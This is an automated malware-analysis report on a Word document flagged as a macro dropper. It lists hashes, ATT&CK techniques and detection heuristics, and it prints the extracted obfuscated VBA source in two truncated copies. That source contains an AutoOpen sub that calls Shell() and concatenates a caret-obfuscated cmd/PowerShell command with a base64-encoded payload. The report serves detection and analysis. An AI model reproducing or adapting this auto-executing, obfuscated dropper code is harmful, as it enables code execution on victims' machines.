Office (OLE) malware analysis — malicious · adc6a09dba396ecf

MALICIOUS

Office (OLE)

103.8 KB Created: 2018-06-06 09:26:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: d92ed526afc3c178fb0211384ea00d71 SHA-1: 9a0f8bc420f7c07b053cbb03d89ba3821bcac1ab SHA-256: adc6a09dba396ecf37fa97eadf197b7e5f061ed2de1d009737cf258bb76b7607

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious OLE document containing VBA macros. The Autoopen macro triggers a Shell() call, which is designed to execute a command. This command appears to be constructing a string that likely downloads and executes a second-stage payload. The ClamAV detection also confirms its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6574822-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6574822-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10046 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10046 bytes
SHA-256: `1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wKjjNDCSzIPZR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function SljzT() On Error Resume Next TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm)) nzSiYE = Cos(vrpmi) cVEimz = CDate(MNIfH) IjWkv = Cos(owpArb) kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG)) ButnVM = Cos(fNUsm) FwIrN = CDate(biNVR) IEEjn = Cos(uTvXP) SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128) izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ)) wSXij = Cos(NQpUC) WdajY = CDate(Uifuok) qWFkcH = Cos(klpVAw) End Function Sub Autoopen() On Error Resume Next ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR)) nEjZqQ = Cos(Ukcbwn) HHsoK = CDate(EmrNzw) kiwzr = Cos(SMttK) SljzT KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo)) kcVLOO = Cos(LzusUp) wqAkF = CDate(YlwmLf) khLtV = Cos(WbakFl) End Sub Attribute VB_Name = "mNGdnjYT" Function aQvPhPoDb() On Error Resume Next znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU)) CPEwA = Cos(UBCBVo) pKoXZh = CDate(RLSfY) SVYiu = Cos(hXRMQ) whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR" ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd)) HSGYY = Cos(XVzBCn) GGJZRH = CDate(BuJPXZ) rblQB = Cos(NEGHO) wCYSzhDfuVS = "jYYtlS &" + " %^c^o^m" + "^S^p^E^c^" + "% %^c^o^m" + "^S^p^E^c^% " + " /V " QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB)) PBACKp = Cos(YptSAK) XYLWT = CDate(KuszQ) dhiRm = Cos(MawpS) EMDjPu = " " + "/c " + " set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s" EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ)) XGMnjM = Cos(GzSLIs) YGZXq = CDate(bjvoU) djOcHw = Cos(cFMiCH) wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s" dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR)) LLcXP = Cos(sbwWi) PZvRQh = CDate(DPRBGj) rcIQN = Cos(STsZUo) pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V" Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs)) wjWwc = Cos(UHdbM) AChXi = CDate(jCDTw) zAQij = Cos(IfzQY) cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv" idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb)) TjTkd = Cos(oFlii) wfQtNZ = CDate(ojnGHB) vafzzh = Cos(LzRmDN) ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!" DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP)) jwHKMF = Cos(AEKziP) hbkPot = CDate(TqaUfd) GwOHDv = Cos(twEVn) cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi" icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr)) UWofft = Cos(rCqbO) MNHHu = CDate(vhrJmO) oLGkU = Cos(UTwts) HwtwCz = "dYWiQwar%!" + " -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL" WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok)) WItBO = Cos(PoXYj) pmGvv = CDate(wSwHS) VVjrD = Cos(RXuiA) XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA" aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk End Function Function MdBoYR() On Error Resume Next ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl)) GMIGm = Cos(WdMBtA) qLYiG = CDate(ilffbO) hDlNIA = Cos(ZUAoj) pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA" NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws)) osVLkB = Cos(hjuEo) vnhsi = CDate(bYItt) HnmMj = Cos(bwfiF) wfNfMK = ... (truncated)

SHA-256: 1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "wKjjNDCSzIPZR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SljzT()
On Error Resume Next
TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm))
nzSiYE = Cos(vrpmi)
cVEimz = CDate(MNIfH)
IjWkv = Cos(owpArb)
kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG))
ButnVM = Cos(fNUsm)
FwIrN = CDate(biNVR)
IEEjn = Cos(uTvXP)
SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
wSXij = Cos(NQpUC)
WdajY = CDate(Uifuok)
qWFkcH = Cos(klpVAw)
End Function
Sub Autoopen()
On Error Resume Next
ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR))
nEjZqQ = Cos(Ukcbwn)
HHsoK = CDate(EmrNzw)
kiwzr = Cos(SMttK)
SljzT
KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo))
kcVLOO = Cos(LzusUp)
wqAkF = CDate(YlwmLf)
khLtV = Cos(WbakFl)
End Sub


Attribute VB_Name = "mNGdnjYT"
Function aQvPhPoDb()
On Error Resume Next
znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU))
CPEwA = Cos(UBCBVo)
pKoXZh = CDate(RLSfY)
SVYiu = Cos(hXRMQ)
whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR"
ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd))
HSGYY = Cos(XVzBCn)
GGJZRH = CDate(BuJPXZ)
rblQB = Cos(NEGHO)
wCYSzhDfuVS = "jYYtlS &" + "     %^c^o^m" + "^S^p^E^c^" + "%     %^c^o^m" + "^S^p^E^c^%    " + " /V    "
QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB))
PBACKp = Cos(YptSAK)
XYLWT = CDate(KuszQ)
dhiRm = Cos(MawpS)
EMDjPu = "     " + "/c         " + "  set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s"
EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ))
XGMnjM = Cos(GzSLIs)
YGZXq = CDate(bjvoU)
djOcHw = Cos(cFMiCH)
wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s"
dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR))
LLcXP = Cos(sbwWi)
PZvRQh = CDate(DPRBGj)
rcIQN = Cos(STsZUo)
pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V"
Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs))
wjWwc = Cos(UHdbM)
AChXi = CDate(jCDTw)
zAQij = Cos(IfzQY)
cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv"
idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb))
TjTkd = Cos(oFlii)
wfQtNZ = CDate(ojnGHB)
vafzzh = Cos(LzRmDN)
ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!"
DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP))
jwHKMF = Cos(AEKziP)
hbkPot = CDate(TqaUfd)
GwOHDv = Cos(twEVn)
cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi"
icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr))
UWofft = Cos(rCqbO)
MNHHu = CDate(vhrJmO)
oLGkU = Cos(UTwts)
HwtwCz = "dYWiQwar%!" + "  -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL"
WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok))
WItBO = Cos(PoXYj)
pmGvv = CDate(wSwHS)
VVjrD = Cos(RXuiA)
XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA"
aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk
End Function
Function MdBoYR()
On Error Resume Next
ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl))
GMIGm = Cos(WdMBtA)
qLYiG = CDate(ilffbO)
hDlNIA = Cos(ZUAoj)
pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA"
NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws))
osVLkB = Cos(hjuEo)
vnhsi = CDate(bYItt)
HnmMj = Cos(bwfiF)
wfNfMK =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.